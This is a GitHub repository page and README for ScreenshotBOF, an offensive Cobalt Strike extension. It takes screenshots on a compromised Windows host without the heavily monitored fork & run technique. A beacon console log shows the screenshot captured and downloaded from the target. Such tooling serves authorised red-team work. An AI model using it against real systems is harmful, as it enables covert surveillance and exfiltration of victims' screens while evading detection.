Go to file

CodeXTF2 d8fc3deb79 readme		2022-10-23 17:06:37 +08:00
ScreenshotBOF	first commit	2022-10-23 16:58:24 +08:00
bin/BOF	first commit	2022-10-23 16:58:24 +08:00
.gitignore	first commit	2022-10-23 16:58:24 +08:00
README.md	readme	2022-10-23 17:06:37 +08:00
ScreenshotBOF.sln	first commit	2022-10-23 16:58:24 +08:00

README.md

ScreenshotBOF

An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.

Usage

import the screenshotBOF.cna script into Cobalt Strike
use the command screenshot_bof
Download the screenshot from the target

beacon> screenshot_bof
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 3411 bytes
[+] received output:
[*] Tasked beacon to printscreen and save to disk
[+] received output:
[+] PrintScreen saved to bitmap...
[+] received output:
[+] Printscreen bitmap saved to screenshot.bmp
beacon> download screenshot.bmp
[*] Tasked beacon to download screenshot.bmp
[+] host called home, sent: 22 bytes
[*] started download of C:\screenshot.bmp (12441668 bytes)
[*] download of screenshot.bmp is complete

Notes

no evasion is performed, which should be fine since the WinAPIs used are not malicious
in memory downloading of screenshots is planned to be added
the filename can be changed in the source code.

Why did I make this?

Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.

Credits

Made using https://github.com/securifybv/Visual-Studio-BOF-template